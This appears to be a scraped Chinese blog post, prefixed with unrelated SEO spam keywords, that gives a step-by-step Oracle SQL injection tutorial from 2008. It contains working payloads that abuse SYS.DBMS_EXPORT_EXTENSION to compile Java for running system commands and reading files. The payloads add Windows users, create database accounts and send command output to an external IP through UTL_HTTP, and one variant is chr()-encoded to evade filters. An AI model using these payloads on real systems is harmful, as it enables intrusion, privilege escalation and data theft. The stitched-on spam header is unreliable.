如何规划网站栏目,显示网站建设中,成都设计公司官网,百度seo快速排名优化以下的演示都是在web上的sql plus执行的#xff0c;在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 /xxx.jsp?id1 and 1a||(select SYS.DBMS_EXPORT_EXTENSION.....) 的形式即可。(用 a|| 是为了让语句返回true值) 语句有点长…以下的演示都是在web上的sql plus执行的在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 /xxx.jsp?id1 and 1a||(select SYS.DBMS_EXPORT_EXTENSION.....) 的形式即可。(用 a|| 是为了让语句返回true值) 语句有点长可能要用post提交。 以下是各个步骤 1.创建包 通过注入 SYS.DBMS_EXPORT_EXTENSION 函数在oracle上创建Java包LinxUtil里面两个函数runCMD用于执行系统命令readFile用于读取文件 /xxx.jsp?id1 and 1a||( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO,BAR,DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE create or replace and compile java source named LinxUtil as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader new BufferedReader( new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str;while ((stemp myReader.readLine()) ! null) str stemp\n;myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader new BufferedReader(new FileReader(filename)); String stemp,str;while ((stemp myReader.readLine()) ! null) str stemp\n;myReader.close();return str;} catch (Exception e){return e.toString();}} };END;;END;--,SYS,0,1,0) from dual ) ------------------------ 如果url有长度限制可以把readFile()函数块去掉即 /xxx.jsp?id1 and 1a||( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO,BAR,DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE create or replace and compile java source named LinxUtil as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader new BufferedReader( new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str;while ((stemp myReader.readLine()) ! null) str stemp\n;myReader.close();return str;} catch (Exception e){return e.toString();}} };END;;END;--,SYS,0,1,0) from dual ) 同时把后面步骤 提到的 对readFile()的处理语句去掉。 ------------------------------ 2.赋Java权限 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO,BAR,DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE begin dbms_java.grant_permission( PUBLIC, SYS:java.io.FilePermission, ALL FILES, execute );end;;END;;END;--,SYS,0,1,0) from dual 3.创建函数 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO,BAR,DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name LinxUtil.runCMD(java.lang.String) return String; ;END;;END;--,SYS,0,1,0) from dual select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO,BAR,DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name LinxUtil.readFile(java.lang.String) return String; ;END;;END;--,SYS,0,1,0) from dual 4.赋public执行函数的权限 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO,BAR,DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE grant all on LinxRunCMD to public;END;;END;--,SYS,0,1,0) from dual select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO,BAR,DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE grant all on LinxReadFile to public;END;;END;--,SYS,0,1,0) from dual 5.测试上面的几步是否成功 and 111||( select OBJECT_ID from all_objects where object_name LINXRUNCMD ) and 1( select OBJECT_ID from all_objects where object_name LINXREADFILE ) 6.执行命令 /xxx.jsp?id1 and 1( select sys.LinxRunCMD(cmd /c net user linx /add) from dual ) /xxx.jsp?id1 and 1( select sys.LinxReadFile(c:/boot.ini) from dual
) 注意sys.LinxReadFile()返回的是varchar类型不能用and 1 代替 and 1。 如果要查看运行结果可以用 union : /xxx.jsp?id1 union select sys.LinxRunCMD(cmd /c net user linx /add) from dual 或者UTL_HTTP.request(: /xxx.jsp?id1 and 1( SELECT UTL_HTTP.request(http://211.71.147.3/record.php?aLinxRunCMD:||REPLACE(REPLACE(sys.LinxRunCMD(cmd /c net user aaa /del), ,%20),\n,%0A)) FROM dual ) /xxx.jsp?id1 and 1( SELECT UTL_HTTP.request(http://211.71.147.3/record.php?aLinxRunCMD:||REPLACE(REPLACE(sys.LinxReadFile(c:/boot.ini), ,%20),\n,%0A)) FROM dual ) 注意用UTL_HTTP.request时要用 REPLACE() 把空格、换行符给替换掉否则会无法提交http request。用utl_encode.base64_encode也可以。 -------------------- 6.内部变化 通过以下命令可以查看all_objects表达改变 select * from all_objects where object_name like %LINX% or object_name like %Linx% 7.删除我们创建的函数 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO,BAR,DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE drop function LinxRunCMD ;END;;END;--,SYS,0,1,0) from dual 全文结束。谨以此文赠与我的朋友。 linx 124829445 2008.1.12 linyujianbjfu.edu.cn 测试漏洞的另一方法 创建oracle帐号 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO,BAR,DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE CREATE USER linxsql IDENTIFIED BY linxsql;END;;END;--,SYS,0,1,0) from dual 即 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82), chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 确定漏洞存在 1( select user_id from all_users where usernameLINXSQL ) 给linxsql连接权限 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO,BAR,DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE GRANT CONNECT TO linxsql;END;;END;--,SYS,0,1,0) from dual 删除帐号 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO,BAR,DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE drop user LINXSQL;END;;END;--,SYS,0,1,0) from dual 以下方法创建一个可以执行多语句的函数Linx_query()执行成功的话返回数值1但权限是继承的可能仅仅是public权限作用似乎不大真的要用到话可以考虑grant dba to 当前的User 1.jsp?id1 and 1( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO,BAR,DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; ;END;;END;--,SYS,0,1,0) from dual) and ... 1.jsp?id1 and 1( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO,BAR,DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE)
